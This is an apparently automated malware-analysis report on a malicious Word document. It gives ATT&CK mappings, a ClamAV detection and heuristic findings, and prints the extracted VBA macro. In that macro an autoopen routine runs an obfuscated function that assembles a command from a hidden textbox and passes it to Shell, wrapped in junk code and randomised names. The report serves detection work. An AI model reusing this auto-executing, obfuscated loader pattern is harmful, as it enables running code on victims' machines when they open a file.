MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses the Shell() function, indicating an attempt to execute arbitrary code. Heuristics also indicate references to PowerShell and cmd.exe, suggesting the macro likely downloads and executes a second-stage payload. The ClamAV detection 'Doc.Malware.Sonbokli-6786376-0' further confirms its malicious nature.
Heuristics 10
-
ClamAV: Doc.Malware.Sonbokli-6786376-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sonbokli-6786376-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca) Select Case zkbUQkjGbBDiVRYfMOI -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() GiIvHcf -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9931 bytes |
SHA-256: a15e8c34622087857b9938c39724f15199ccadab7275178c6b9f6a986519dfd0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
265 of 308 identifiers look randomly generated (e.g. 'IDERijbrjplIvitQQCLbjqwH') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "AiliVFBnpQBWf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
GiIvHcf
End Sub
Attribute VB_Name = "jCrccuGihAQA"
Function GiIvHcf()
On Error Resume Next
Select Case uiBizvUWjWiYSNqvNtF
Case 211762241
ZvlSHSObvElzChPUMvBiqXlm = fTOcpoozZUnPPpcFunRtZQfa
AzDBHBJzVczAzFQzBdM = Log(EwFYYvkTsYPnnAoqkwR)
dQtNdFuhBwXmTzWEsi = 189480325
RpGzNLMwRZMFLtzo = svTBCSwAcUoikz
Case 39275106
FBoJwzSswQbkRbZBiB = 341471985
JKPXKwlqYUhcGmFrJiGsc = Log(EmqMiAvnwjwWJvmRzzO)
UbjzdfVhrDuHGiFdjwN = 238092348
kYzikcKFsiGiBFdCqiDiNvso = Log(PbpIkBlijjDlVtCLbzYncFc)
End Select
Set apPKFipjInUBVzHdVzUW = RVpATlvTBOJwMiumbZz
Select Case tRMziBszBzUfDqRSVZtRtJ
Case 327569417
oljBGZGbAUuUQmKj = YYQYRYoNGptiUzkT
JtSqsbqtfiwwBiPJEUkhnWMu = Log(zkNsfXKBQdQRWjwZimpsQE)
iYPczmLnjXCsrdA = 338269233
lvkFwsionHJjWBXv = jUQuKPEqjtTnEwiniGVU
Case 6686848
fhoLiCDKVfzNujjQbjfO = 94362220
OBiKivrvBacCpjGwkBmZXopr = Log(wEOfpomRfSndUY)
SaiWkrqzJcvdcoc = 174944361
rIjrdQMmqlJQSVQd = Log(HwJSGKHEECtKKdCsclLr)
End Select
Set oKRktGjjrHfzzjjQs = zZnYNSbjHHYqjEmOSlsiM
Select Case IZZLRnBBKVJOwhQdEYCNfBU
Case 226235697
KJppoZolLApofcnW = rTcCAvqaTJhLMHErBGi
LVvVcnjapYwPrEJA = Log(HKNzOVPGawskwdV)
LOVXHZNOQkuNRTH = 326687805
ltwQLzAjOCoopt = aGjqodwiwwiiaBoGrvhLjYs
Case 337374978
UrsXZaarzmLnRJanL = 1678958
cSaiavztIhLBOhYTm = Log(KXYInaPdTZlGXYY)
WwuMScbhSJokwGspohA = 189700483
UfzPwbXHBKndnKaYZnivrqd = Log(ijNhwSpXvhBTvwVADaQzAH)
End Select
Set vSROuShCiCMlQOq = jUQhGJHccRirQZim
Select Case CYbWSLGdvrtmpNsolrw
Case 81896631
fkZmwIwvQSqdIui = TCZvKziFTLwUiCG
VWXoCjUCJhfYDIjTKjRo = Log(QuiCTSmMcNOMKIlWtFj)
XmcSJCKicJCkRHEbpmjRh = 280516889
URLsAuwQbiGBiSPsQHHj = KdvDDKhHWSBjFHBzK
Case 68298671
jtbBLGaJZtSJZHOKnQpwk = 96834096
FQEUYKOuGzXDZjb = Log(zdAIOEIbZrzOhVNzRkWlG)
BzLwLLCDobLjrTjGuBHdv = 220835322
ANljYlpNpdLcBzPs = Log(ZVCVCBduPLpVicqTmKlZciRz)
End Select
Set VCjqiJfIKEZfrzMIo = azsKAUIPmiTUvDC
Const DwNpiWpA = 0
Select Case lVwlVOfIYfPvML
Case 312551555
FCuRJrUZHOwzvmHj = ZzvQZPMtiHKMIHI
uwfivtuAXiHQiMlXjnnN = Log(tjniYbkJNzHqTBqcENfDvtuI)
LVVnjVTuiBPrwWSKqKfzZOKv = 305664991
ZHKEAlimMFOWjinvoAa = IqNtEjPIWwLatFvMjZAdN
Case 67441472
MvUdBMiaKUJTitRA = 111466308
WQPuodbibLOzzXzjAz = Log(FOwrWAGjmMSSZjHquuSHq)
SkSLLWlVCsTQLH = 170518531
tuhtpVItpPqhDliqtCw = Log(ZLojwRKZwJYzQWBY)
End Select
Set wNwcZWvjERQKdXILOwh = wvYLjufrqQhkKQw
Select Case rptbBCRRihSiai
Case 60944573
XnkDstXtTwXfwqddki = iznlLKQHoOjXnUirqAoKzS
IFflVoEozrqiXj = Log(YscmifkYjLRzmc)
XrMzfjfZuSkZlfzpHHobwiLk = 138290136
jvaDpRMBUzSXDWsThTz = wtmVKrwAzpfciHA
Case 238460256
qdSNjLzXjERjcArmPZnJEtzT = 76948995
iTqtwVIUqqfsPh = Log(wbnjRWoopPhNbuzfzBhjih)
IwaIJBGXKFUGRKmufqfAdO = 56865580
ZtKfqiBKQkfkrNfmjsXHG = Log(fVMHBqzhMtnsjQrajcEJpj)
End Select
Set CCSKsRlqAalNoTjhKLjY = zwiPvILvDwwwqKEifGPaD
Select Case vzNqVzoNGQNPHLvbXZbGjz
Case 113748171
ZFwdmZZPHYfUwpbtYh = IDERijbrjplIvitQQCLbjqwH
fbchzhizDJQUnOwKipZWQ = Log(lEYLqMFPREwjCEwJlICIs)
dwdoOQzAZlSvpYJmqVu = 263425614
MYDLsLZEQTIrMbchCwoRRiK = HOazzRhOEiRXZdVEY
Case 317662200
RJDdzhFoXFWZhNm = 25750100
lZEwmuniJEHZcktVVtHD = Log(dStdKIiIjKmZsTwrKiPQw)
cwOuVcDMUfArIGLVclFVau = 135286722
kQuiKOrnnppvPP = Log(FEXpHYAKrfpCiKdNidOKEi)
End Select
Set BFnMESRPFNzzQCENbjG = wVLNcKcHSBFjXf
Select Case ujKHAHpoLmDwRwOtmKKuYHiC
Case 52461296
unfuZBCfDvuMzaVr = ZqBwDuEFflLbnAHzoN
IQNCwmtTzZMkYj = Log(JMGOqsaotPrEPunNINUjEM)
FKKaFjSBmuBrutaWIibTmE = 226726014
ZMMEWEzhzYAEfSUIbNEJ = CsUirLAcsBAbhBtTO
Case 205701779
zUuVsVqqNTsYAYOXTsVis = 322251076
EXzcwQboMiWMtH = Log(bNBVmJzcACTdZbsApA)
pwtssZmifqiMUPzRI = 195846377
KuFuzaimBNUijMdSXh = Log(IvAiTmVqwOcJkWSqVk)
End Select
Set uSNmlQLHwArzZj = UbJQlHdjjYYEkLOWHhTnCv
Select Case YlDWTLoHGrjnlMoihiaR
Case 71876279
tBvtSiDHYAchwEwMDK = GpKRtzbXoTODsRCrBbZt
EwSiKEOjjViPnDh = Log(jBwrKOnKwkQwMwldRYCqr)
jtMnEwjnFNUJSZdCvpLIm = 173795293
SWnkAwOBqqARDiWKpaIiCb = iLAPdMijwJFuRR
Case 92173373
prMiSSHaXYfWidwlrTIYA = 228422692
oMHDIzjFsbrTmqzkMDZrE = Log(IATMTDwIpiGGXRLOwcnSm)
rKJutiwVaqjGDHkvijHjmIM = 216434472
fZzEzDluNJIDYJPMT = Log(PZQODdCwHLDIizc)
End Select
Set OIwQdnvMpzbsFWrXSAw = BQVUBwwarFbLbwu
FJiHDJoBvaI = AiliVFBnpQBWf.TextBox1 + iciEZ + KtlTf + SrFKGM + PVTdz + UUkWQQIb + BUawmiO + JGWwUjoA + GXLXZjN + iUbLi + jpjlu + cHJmiQ
Select Case GjuaofTcPWMGpQjUlpIpkd
Case 185276828
dYAidFWwcuAUNX = XtMCptkWviKLqj
EcEuzQfozJAQivPO = Log(NolwYbmHsBFATtf)
QqYPTaksFMtpcFbjP = 20969943
CvPfBSmEOZnfPVAOErwnnEsq = hwinZZlQvcUALWzj
Case 141964255
SSjiUcrXpQQLwCZTTV = 54732018
pABPTsfOtUBGRiaXi = Log(cBwCjVAkiSarCb)
EjRRRKczcdUPJtPbCoQ = 298824932
VmQjPiNNoBSZhNC = Log(FNtAETYPGqrPqXD)
End Select
Set iRitAlBbOkocCpcfMSwaWt = BOBaZrwWQwfrPi
Select Case soTDKucXliYCMWWFznsaril
Case 39353978
pVaFKmNwpFpzppuYzdWScOi = kTtAECODNLUYBSa
LEXQjFHzwCrAPnPbnSUrtMtm = Log(mmiVVXhCaHYqScfLvCCKOoZ)
tljzjCwKkZtTdccfKzofrkUq = 272859816
zKrbcwMibknjTYJNFsiL = SaWAQzuEIRsICEoTJzvGu
Case 6284503
radQWdfcIdzfjUbLwSiTTub = 111568322
UuwvmFnRifZniXadok = Log(FYEwhlwoQhZwzMwBiijV)
KNBpBYQuDqiJzLuQwOK = 273058841
WkJiaalWruIPGvKDI = Log(MjtNqumCBClmTWjHndsH)
End Select
Set wiYLvWuqQkMnizIWJtO = YZjkFbliwIhKBEOBVBuYrLkR
Select Case liQqczZjMqJlPNriiJuElFi
Case 48292880
fzoPaROVmcwHoSY = QpDjtwDJHGqBWHfAI
wCkTmZvPdkuatrVmVPaXP = Log(tiHTbMziwwwGVWhzDiodU)
PhMwfkmQZkSOJFLSzi = 107815517
nwbnVzEXMwjlMaPaGchOsjWN = GMbmkjGNWfRFZdfjODdBjC
Case 229833539
kMVBBFHbOwOmclcPcYqvwV = 218895407
BiictMIEdlBXKFLQYpraOsDd = Log(NYHLnsOiWzSbiiBqKJr)
EEXMaXIiGkIfABfnAtqtn = 296723620
FtotHpkEjMuWIAvlQjkYmr = Log(bcCOqQTwwLQSTldBpWfYTG)
End Select
Set XmEHZJCUBNGNQEaunQNz = ricAnhuCGSUUwfcl
Select Case jwzpVQCAzdJKkhXG
Case 46771868
rSBKwNzOJijKNLAQD = OiIFvMDaARdXjcPAw
JVwlpGGTTmPwJUdEsYImWpG = Log(NhlmwEvNPJGhUctCwct)
KBIJtfjrrJUUPZXIV = 135102298
OqCjzNwkPfGnuvoNMZ = sTUEVFolSuFkjiGiaHS
Case 60937234
zvULkWaYaMLjucCtmhdKcdpK = 305824814
JnROGtPjuYAskiOMrit = Log(lCEkoaowTUFKRK)
mHMFRTOhdttwvvPl = 48367220
soHijZfFQMaSqbaVb = Log(fcciXUaruitCEiz)
End Select
Set YVFEamZMCBGLCSWZUJGinKQ = HoiBMNIsUwCEPXisCQfWNP
otqOFNXMz = Array(brIFIS, EcHmcHS, ulsSYwIiX, Interaction.Shell(FJiHDJoBvaI, DwNpiWpA), EUddPca)
Select Case zkbUQkjGbBDiVRYfMOI
Case 213553833
MjWLVLlZwwPbYOoBAoZiIRa = jZDvqjUCOjnDFIuZzhdEoGwC
dLaizkvGXfvIqjObMNrbl = Log(rtAkaoVKadAMMYtUQwrzhdwQ)
wOcctFbwhThiNJG = 238962951
ESIiWqhswvjnOOuj = cathjXYNfEMlDmlMUYjI
Case 194425028
XvkzJsKSFnzkhjrjYuj = 110884928
mVGsJwaupOazBCzzjOjCMzY = Log(SEEVoAlZMklZiEAtkYPZYl)
itiojCOimwTaEtFGodAm = 111869160
YTfNmSojzNhYZcFME = Log(wFwcKdwAfSbwYwPNUP)
End Select
Set TPwqDzGsfTcAcYd = LSwIBQmnWIDpiJMHpDkHCP
Select Case FRjiwhfsuzlmbuYhGYj
Case 165473779
HYHBqDWYPlNWlQqlcdG = tBXfSoEiCwlwVAwtchFiIUf
YPqiiwivdiiFAbjCw = Log(VRzQBkRzJuYbhYWJHCwazG)
qTmVssAwDfVwOOHOFM = 243232673
jXBAFjrTjDYoPzJzOPZFIw = vMaHuAosNOTkSRmPIA
Case 215693894
zHjjREKzqnfimCFnf = 184445548
TsLLZvMqfczQEbfVofqqqppC = Log(iowQLwjjDMZowHoENiW)
XbDHjRIplHdDIlqHNaTiPjA = 96688268
hrYClcLSMCHlqkt = Log(uvwiWfKRhrnKranaoBwajn)
End Select
Set iSkwjjVXpZoVoEfjCjHUuoAa = PjwomTGGvRQlibiLTwlDF
Select Case vfUpGjtUcoEJdzDmfDrlL
Case 79390792
FbBKSVvztWpvjCqKauBO = ZiNcuosEnBZjzPOEYbwjqK
oDTkotRqKzsjzohYjDsFVP = Log(kmbFCTCivOrYZaED)
WKPlGjRPqDSdwFQZ = 282489848
zNnPXHPzRFQIzczhiKzad = KpLQkEzIaziqHq
Case 154770044
nIWJRMziFpdRXGZ = 106030876
uCwDGWKAJiQZGVI = Log(bXqETmwpcKuajlUZ)
kNoZDjlLJHhiIwUVH = 316186135
iLmHEIawbjTYJrHVIUkXq = Log(sKiQHULaFZpmqGw)
End Select
Set jRdkKcpjXrBdMBW = rdTbdnBGkBiuiXAAWDk
Select Case TwJSozjKPHBZhHhw
Case 324122818
XvUJjnaDwHBqTlUUlBsIYhfh = kfKpZFYcDEVrJPWs
zYJZoPFNWfGpXpPnzwIPN = Log(CcNPhzcblVPniHXnwPE)
CZRnjPFDMTOdWaVjLZi = 40075943
vtlZjHIPKzsKmWdLaiRtY = SHmQHlrbWhwqHfjOw
Case 53767800
nCTVSkEsVlqQMMjbdnSzXYid = 71002413
vPwiMlJwkNwlTjDt = Log(qfQmdaDCadJZPTqLGo)
tqYFGPcTdsTmviCrztZSou = 184323825
HAWVtIaNrPzfRaJWBHaKH = Log(NvMcsRjWAzOnzGtHZURFvff)
End Select
Set ZXjDRjTRiQmaIRPJjU = zRicDduiFsBvhQpCV
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.